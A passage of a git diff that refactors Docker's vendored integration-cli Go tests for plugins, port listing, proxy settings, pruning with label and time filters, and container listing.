*check.C) { + pNameWithTag := ps.getPluginRepoWithTag() + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) c.Assert(err, checker.IsNil) out, _, err := dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, pName) - c.Assert(out, checker.Contains, pTag) + c.Assert(out, checker.Contains, pNameWithTag) c.Assert(out, checker.Contains, "true") // Find the ID first @@ -273,7 +324,7 @@ func (s *DockerSuite) TestPluginInspect(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Equals, id) // Name without tag form - out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pName) + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", ps.getPluginRepo()) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Equals, id) @@ -300,68 +351,96 @@ func (s *DockerSuite) TestPluginInspectOnWindows(c *check.C) { c.Assert(err.Error(), checker.Contains, "plugins are not supported on this platform") } -func (s *DockerTrustSuite) TestPluginTrustedInstall(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginIDPrefix(c *check.C) { + name := "test" + client := testEnv.APIClient() + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + initialValue := "0" + err := plugin.Create(ctx, client, name, func(cfg *plugin.Config) { + cfg.Env = []types.PluginEnv{{Name: "DEBUG", Value: &initialValue, Settable: []string{"value"}}} + }) + cancel() - trustedName := s.setupTrustedplugin(c, pNameWithTag, "trusted-plugin-install") + c.Assert(err, checker.IsNil, check.Commentf("failed to create test plugin")) - installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", trustedName) - s.trustedCmd(installCmd) - out, _, err := runCommandWithOutput(installCmd) + // Find ID first + id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", name) + id = 
strings.TrimSpace(id) + c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + // List current state + out, _, err := dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + c.Assert(out, checker.Contains, name) + c.Assert(out, checker.Contains, "false") + + env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", id[:5]) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=0]") + dockerCmd(c, "plugin", "set", id[:5], "DEBUG=1") + + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", id[:5]) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") + + // Enable + _, _, err = dockerCmdWithError("plugin", "enable", id[:5]) + c.Assert(err, checker.IsNil) out, _, err = dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) c.Assert(out, checker.Contains, "true") - out, _, err = dockerCmdWithError("plugin", "disable", trustedName) + // Disable + _, _, err = dockerCmdWithError("plugin", "disable", id[:5]) c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) - - out, _, err = dockerCmdWithError("plugin", "enable", trustedName) + out, _, err = dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + c.Assert(out, checker.Contains, name) + c.Assert(out, checker.Contains, "false") - out, _, err = dockerCmdWithError("plugin", "rm", "-f", trustedName) + // Remove + out, _, err = dockerCmdWithError("plugin", "remove", id[:5]) c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) - - // Try untrusted pull to ensure we pushed the tag to the registry - installCmd = exec.Command(dockerBinary, "plugin", "install", "--disable-content-trust=true", "--grant-all-permissions", trustedName) - s.trustedCmd(installCmd) - out, 
_, err = runCommandWithOutput(installCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) - + // List returns none out, _, err = dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "true") - + c.Assert(out, checker.Not(checker.Contains), name) } -func (s *DockerTrustSuite) TestPluginUntrustedInstall(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginListDefaultFormat(c *check.C) { + config, err := ioutil.TempDir("", "config-file-") + c.Assert(err, check.IsNil) + defer os.RemoveAll(config) - pluginName := fmt.Sprintf("%v/dockercliuntrusted/plugintest:latest", privateRegistryURL) - // install locally and push to private registry - dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", pluginName, pNameWithTag) - dockerCmd(c, "plugin", "push", pluginName) - dockerCmd(c, "plugin", "rm", "-f", pluginName) + err = ioutil.WriteFile(filepath.Join(config, "config.json"), []byte(`{"pluginsFormat": "raw"}`), 0644) + c.Assert(err, check.IsNil) + + name := "test:latest" + client := testEnv.APIClient() + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + err = plugin.Create(ctx, client, name, func(cfg *plugin.Config) { + cfg.Description = "test plugin" + }) + c.Assert(err, checker.IsNil, check.Commentf("failed to create test plugin")) + + out, _ := dockerCmd(c, "plugin", "inspect", "--format", "{{.ID}}", name) + id := strings.TrimSpace(out) - // Try trusted install on untrusted plugin - installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", pluginName) - s.trustedCmd(installCmd) - out, _, err := runCommandWithOutput(installCmd) + // We expect the format to be in `raw + --no-trunc` + expectedOutput := fmt.Sprintf(`plugin_id: %s +name: %s +description: test plugin +enabled: false`, id, name) - 
c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) + out, _ = dockerCmd(c, "--config", config, "plugin", "ls", "--no-trunc") + c.Assert(strings.TrimSpace(out), checker.Contains, expectedOutput) } func (s *DockerSuite) TestPluginUpgrade(c *check.C) { - testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64) + testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64, NotUserNamespace) plugin := "cpuguy83/docker-volume-driver-plugin-local:latest" pluginV2 := "cpuguy83/docker-volume-driver-plugin-local:v2" @@ -377,17 +456,38 @@ func (s *DockerSuite) TestPluginUpgrade(c *check.C) { id := strings.TrimSpace(out) // make sure "v2" does not exists - _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2")) + _, err = os.Stat(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "plugins", id, "rootfs", "v2")) c.Assert(os.IsNotExist(err), checker.True, check.Commentf(out)) dockerCmd(c, "plugin", "disable", "-f", plugin) dockerCmd(c, "plugin", "upgrade", "--grant-all-permissions", "--skip-remote-check", plugin, pluginV2) // make sure "v2" file exists - _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2")) + _, err = os.Stat(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "plugins", id, "rootfs", "v2")) c.Assert(err, checker.IsNil) dockerCmd(c, "plugin", "enable", plugin) dockerCmd(c, "volume", "inspect", "bananas") dockerCmd(c, "run", "--rm", "-v", "bananas:/apple", "busybox", "sh", "-c", "ls -lh /apple/core") } + +func (s *DockerSuite) TestPluginMetricsCollector(c *check.C) { + testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64) + d := daemon.New(c, dockerBinary, dockerdBinary) + d.Start(c) + defer d.Stop(c) + + name := "cpuguy83/docker-metrics-plugin-test:latest" + r := cli.Docker(cli.Args("plugin", "install", "--grant-all-permissions", name), cli.Daemon(d)) + c.Assert(r.Error, checker.IsNil, 
check.Commentf(r.Combined())) + + // plugin lisens on localhost:19393 and proxies the metrics + resp, err := http.Get("http://localhost:19393/metrics") + c.Assert(err, checker.IsNil) + defer resp.Body.Close() + + b, err := ioutil.ReadAll(resp.Body) + c.Assert(err, checker.IsNil) + // check that a known metric is there... don't expect this metric to change over time.. probably safe + c.Assert(string(b), checker.Contains, "container_actions") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go index 80b00fe93e..84058cda10 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go @@ -5,9 +5,10 @@ import ( "net" "regexp" "sort" + "strconv" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) @@ -148,9 +149,8 @@ func (s *DockerSuite) TestPortList(c *check.C) { out, _ = dockerCmd(c, "port", ID) - err = assertPortList(c, out, []string{ - "80/tcp -> 0.0.0.0:8000", - "80/udp -> 0.0.0.0:8000"}) + // Running this test multiple times causes the TCP port to increment. 
+ err = assertPortRange(c, out, []int{8000, 8080}, []int{8000, 8080}) // Port list is not correct c.Assert(err, checker.IsNil) dockerCmd(c, "rm", "-f", ID) @@ -173,6 +173,38 @@ func assertPortList(c *check.C, out string, expected []string) error { return nil } +func assertPortRange(c *check.C, out string, expectedTcp, expectedUdp []int) error { + lines := strings.Split(strings.Trim(out, "\n "), "\n") + + var validTcp, validUdp bool + for _, l := range lines { + // 80/tcp -> 0.0.0.0:8015 + port, err := strconv.Atoi(strings.Split(l, ":")[1]) + if err != nil { + return err + } + if strings.Contains(l, "tcp") && expectedTcp != nil { + if port < expectedTcp[0] || port > expectedTcp[1] { + return fmt.Errorf("tcp port (%d) not in range expected range %d-%d", port, expectedTcp[0], expectedTcp[1]) + } + validTcp = true + } + if strings.Contains(l, "udp") && expectedUdp != nil { + if port < expectedUdp[0] || port > expectedUdp[1] { + return fmt.Errorf("udp port (%d) not in range expected range %d-%d", port, expectedUdp[0], expectedUdp[1]) + } + validUdp = true + } + } + if !validTcp { + return fmt.Errorf("tcp port not found") + } + if !validUdp { + return fmt.Errorf("udp port not found") + } + return nil +} + func stopRemoveContainer(id string, c *check.C) { dockerCmd(c, "rm", "-f", id) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go index 1cf569b806..52159aa9c5 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go @@ -2,23 +2,20 @@ package main import ( "net" - "os/exec" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestCLIProxyDisableProxyUnixSock(c *check.C) { - testRequires(c, DaemonIsLinux) - 
testRequires(c, SameHostDaemon) // test is valid when DOCKER_HOST=unix://.. - - cmd := exec.Command(dockerBinary, "info") - cmd.Env = appendBaseEnv(false, "HTTP_PROXY=http://127.0.0.1:9999") - - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil, check.Commentf("%v", out)) + testRequires(c, DaemonIsLinux, SameHostDaemon) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "info"}, + Env: appendBaseEnv(false, "HTTP_PROXY=http://127.0.0.1:9999"), + }).Assert(c, icmd.Success) } // Can't use localhost here since go has a special case to not use proxy if connecting to localhost @@ -40,14 +37,15 @@ func (s *DockerDaemonSuite) TestCLIProxyProxyTCPSock(c *check.C) { c.Assert(ip, checker.Not(checker.Equals), "") - err = s.d.Start("-H", "tcp://"+ip+":2375") - c.Assert(err, checker.IsNil) - cmd := exec.Command(dockerBinary, "info") - cmd.Env = []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999"} - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + s.d.Start(c, "-H", "tcp://"+ip+":2375") + + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "info"}, + Env: []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999"}, + }).Assert(c, icmd.Expected{Error: "exit status 1", ExitCode: 1}) // Test with no_proxy - cmd.Env = append(cmd.Env, "NO_PROXY="+ip) - out, _, err = runCommandWithOutput(exec.Command(dockerBinary, "info")) - c.Assert(err, checker.IsNil, check.Commentf("%v", out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "info"}, + Env: []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999", "NO_PROXY=" + ip}, + }).Assert(c, icmd.Success) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go index dabbc72081..d60420b591 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go +++ 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go @@ -3,23 +3,39 @@ package main import ( + "io/ioutil" + "os" + "path/filepath" "strconv" "strings" + "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/integration-cli/daemon" "github.com/go-check/check" + "gotest.tools/icmd" ) -func pruneNetworkAndVerify(c *check.C, d *SwarmDaemon, kept, pruned []string) { +func pruneNetworkAndVerify(c *check.C, d *daemon.Daemon, kept, pruned []string) { _, err := d.Cmd("network", "prune", "--force") c.Assert(err, checker.IsNil) - out, err := d.Cmd("network", "ls", "--format", "{{.Name}}") - c.Assert(err, checker.IsNil) + for _, s := range kept { - c.Assert(out, checker.Contains, s) + waitAndAssert(c, defaultReconciliationTimeout, func(*check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("network", "ls", "--format", "{{.Name}}") + c.Assert(err, checker.IsNil) + return out, nil + }, checker.Contains, s) } + for _, s := range pruned { - c.Assert(out, checker.Not(checker.Contains), s) + waitAndAssert(c, defaultReconciliationTimeout, func(*check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("network", "ls", "--format", "{{.Name}}") + c.Assert(err, checker.IsNil) + return out, nil + }, checker.Not(checker.Contains), s) } } @@ -40,13 +56,14 @@ func (s *DockerSwarmSuite) TestPruneNetwork(c *check.C) { serviceName := "testprunesvc" replicas := 1 - out, err := d.Cmd("service", "create", "--name", serviceName, + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", + "--name", serviceName, "--replicas", strconv.Itoa(replicas), "--network", "n3", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - waitAndAssert(c, defaultReconciliationTimeout, 
d.checkActiveContainerCount, checker.Equals, replicas+1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, replicas+1) // prune and verify pruneNetworkAndVerify(c, d, []string{"n1", "n3"}, []string{"n2", "n4"}) @@ -56,20 +73,23 @@ func (s *DockerSwarmSuite) TestPruneNetwork(c *check.C) { c.Assert(err, checker.IsNil) _, err = d.Cmd("service", "rm", serviceName) c.Assert(err, checker.IsNil) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 0) + pruneNetworkAndVerify(c, d, []string{}, []string{"n1", "n3"}) } func (s *DockerDaemonSuite) TestPruneImageDangling(c *check.C) { - c.Assert(s.d.StartWithBusybox(), checker.IsNil) + s.d.StartWithBusybox(c) - out, _, err := s.d.buildImageWithOut("test", - `FROM busybox - LABEL foo=bar`, true, "-q") - c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + result := cli.BuildCmd(c, "test", cli.Daemon(s.d), + build.WithDockerfile(`FROM busybox + LABEL foo=bar`), + cli.WithFlags("-q"), + ) + result.Assert(c, icmd.Success) + id := strings.TrimSpace(result.Combined()) - out, err = s.d.Cmd("images", "-q", "--no-trunc") + out, err := s.d.Cmd("images", "-q", "--no-trunc") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Contains, id) @@ -89,3 +109,201 @@ func (s *DockerDaemonSuite) TestPruneImageDangling(c *check.C) { c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id) } + +func (s *DockerSuite) TestPruneContainerUntil(c *check.C) { + out := cli.DockerCmd(c, "run", "-d", "busybox").Combined() + id1 := strings.TrimSpace(out) + cli.WaitExited(c, id1, 5*time.Second) + + until := daemonUnixTime(c) + + out = cli.DockerCmd(c, "run", "-d", "busybox").Combined() + id2 := strings.TrimSpace(out) + cli.WaitExited(c, id2, 5*time.Second) + + out = cli.DockerCmd(c, "container", "prune", "--force", 
"--filter", "until="+until).Combined() + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + + out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) +} + +func (s *DockerSuite) TestPruneContainerLabel(c *check.C) { + out := cli.DockerCmd(c, "run", "-d", "--label", "foo", "busybox").Combined() + id1 := strings.TrimSpace(out) + cli.WaitExited(c, id1, 5*time.Second) + + out = cli.DockerCmd(c, "run", "-d", "--label", "bar", "busybox").Combined() + id2 := strings.TrimSpace(out) + cli.WaitExited(c, id2, 5*time.Second) + + out = cli.DockerCmd(c, "run", "-d", "busybox").Combined() + id3 := strings.TrimSpace(out) + cli.WaitExited(c, id3, 5*time.Second) + + out = cli.DockerCmd(c, "run", "-d", "--label", "foobar", "busybox").Combined() + id4 := strings.TrimSpace(out) + cli.WaitExited(c, id4, 5*time.Second) + + // Add a config file of label=foobar, that will have no impact if cli is label!=foobar + config := `{"pruneFilters": ["label=foobar"]}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + // With config.json only, prune based on label=foobar + out = cli.DockerCmd(c, "--config", d, "container", "prune", "--force").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + c.Assert(strings.TrimSpace(out), checker.Contains, id4) + + out = cli.DockerCmd(c, "container", "prune", "--force", "--filter", "label=foo").Combined() + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + c.Assert(strings.TrimSpace(out), 
checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + + out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + c.Assert(strings.TrimSpace(out), checker.Contains, id3) + + out = cli.DockerCmd(c, "container", "prune", "--force", "--filter", "label!=bar").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Contains, id3) + + out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined() + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + + // With config.json label=foobar and CLI label!=foobar, CLI label!=foobar supersede + out = cli.DockerCmd(c, "--config", d, "container", "prune", "--force", "--filter", "label!=foobar").Combined() + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + + out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) +} + +func (s *DockerSuite) TestPruneVolumeLabel(c *check.C) { + out, _ := dockerCmd(c, "volume", "create", "--label", "foo") + id1 := strings.TrimSpace(out) + c.Assert(id1, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "volume", "create", "--label", "bar") + id2 := strings.TrimSpace(out) + c.Assert(id2, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "volume", "create") + id3 := strings.TrimSpace(out) + c.Assert(id3, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "volume", "create", "--label", "foobar") + id4 := strings.TrimSpace(out) + c.Assert(id4, checker.Not(checker.Equals), "") + + // Add a config file of label=foobar, that will have no impact if cli is label!=foobar + config := `{"pruneFilters": ["label=foobar"]}` + d, err := ioutil.TempDir("", 
"integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + // With config.json only, prune based on label=foobar + out, _ = dockerCmd(c, "--config", d, "volume", "prune", "--force") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + c.Assert(strings.TrimSpace(out), checker.Contains, id4) + + out, _ = dockerCmd(c, "volume", "prune", "--force", "--filter", "label=foo") + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + + out, _ = dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + c.Assert(strings.TrimSpace(out), checker.Contains, id3) + + out, _ = dockerCmd(c, "volume", "prune", "--force", "--filter", "label!=bar") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Contains, id3) + + out, _ = dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + + // With config.json label=foobar and CLI label!=foobar, CLI label!=foobar supersede + out, _ = dockerCmd(c, "--config", d, "volume", "prune", "--force", "--filter", "label!=foobar") + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + + out, _ = dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) +} + +func (s *DockerSuite) TestPruneNetworkLabel(c *check.C) { + dockerCmd(c, "network", 
"create", "--label", "foo", "n1") + dockerCmd(c, "network", "create", "--label", "bar", "n2") + dockerCmd(c, "network", "create", "n3") + + out, _ := dockerCmd(c, "network", "prune", "--force", "--filter", "label=foo") + c.Assert(strings.TrimSpace(out), checker.Contains, "n1") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n2") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n3") + + out, _ = dockerCmd(c, "network", "prune", "--force", "--filter", "label!=bar") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n1") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n2") + c.Assert(strings.TrimSpace(out), checker.Contains, "n3") + + out, _ = dockerCmd(c, "network", "prune", "--force") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n1") + c.Assert(strings.TrimSpace(out), checker.Contains, "n2") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n3") +} + +func (s *DockerDaemonSuite) TestPruneImageLabel(c *check.C) { + s.d.StartWithBusybox(c) + + result := cli.BuildCmd(c, "test1", cli.Daemon(s.d), + build.WithDockerfile(`FROM busybox + LABEL foo=bar`), + cli.WithFlags("-q"), + ) + result.Assert(c, icmd.Success) + id1 := strings.TrimSpace(result.Combined()) + out, err := s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + + result = cli.BuildCmd(c, "test2", cli.Daemon(s.d), + build.WithDockerfile(`FROM busybox + LABEL bar=foo`), + cli.WithFlags("-q"), + ) + result.Assert(c, icmd.Success) + id2 := strings.TrimSpace(result.Combined()) + out, err = s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + + out, err = s.d.Cmd("image", "prune", "--force", "--all", "--filter", "label=foo=bar") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + c.Assert(strings.TrimSpace(out), 
checker.Not(checker.Contains), id2) + + out, err = s.d.Cmd("image", "prune", "--force", "--all", "--filter", "label!=bar=foo") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + + out, err = s.d.Cmd("image", "prune", "--force", "--all", "--filter", "label=bar=foo") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go index 19ede90d5a..a975bc3542 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go @@ -2,33 +2,34 @@ package main import ( "fmt" - "io/ioutil" - "os" - "os/exec" - "path/filepath" "sort" "strconv" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/docker/docker/pkg/stringid" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestPsListContainersBase(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + existingContainers := ExistingContainerIDs(c) + + out := runSleepingContainer(c, "-d") firstID := strings.TrimSpace(out) - out, _ = runSleepingContainer(c, "-d") + out = runSleepingContainer(c, "-d") secondID := strings.TrimSpace(out) // not long running out, _ = dockerCmd(c, "run", "-d", "busybox", "true") thirdID := strings.TrimSpace(out) - out, _ = runSleepingContainer(c, "-d") + out = runSleepingContainer(c, "-d") fourthID := strings.TrimSpace(out) // 
make sure the second is running @@ -42,79 +43,79 @@ func (s *DockerSuite) TestPsListContainersBase(c *check.C) { // all out, _ = dockerCmd(c, "ps", "-a") - c.Assert(assertContainerList(out, []string{fourthID, thirdID, secondID, firstID}), checker.Equals, true, check.Commentf("ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), []string{fourthID, thirdID, secondID, firstID}), checker.Equals, true, check.Commentf("ALL: Container list is not in the correct order: \n%s", out)) // running out, _ = dockerCmd(c, "ps") - c.Assert(assertContainerList(out, []string{fourthID, secondID, firstID}), checker.Equals, true, check.Commentf("RUNNING: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), []string{fourthID, secondID, firstID}), checker.Equals, true, check.Commentf("RUNNING: Container list is not in the correct order: \n%s", out)) // limit out, _ = dockerCmd(c, "ps", "-n=2", "-a") expected := []string{fourthID, thirdID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("LIMIT & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-n=2") - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("LIMIT: Container list is not in the correct order: \n%s", out)) // filter since out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-a") expected = []string{fourthID, thirdID, secondID} - 
c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+firstID) expected = []string{fourthID, secondID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+thirdID) expected = []string{fourthID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) // filter before out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-a") expected = []string{thirdID, secondID, firstID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter & ALL: Container list is not in the 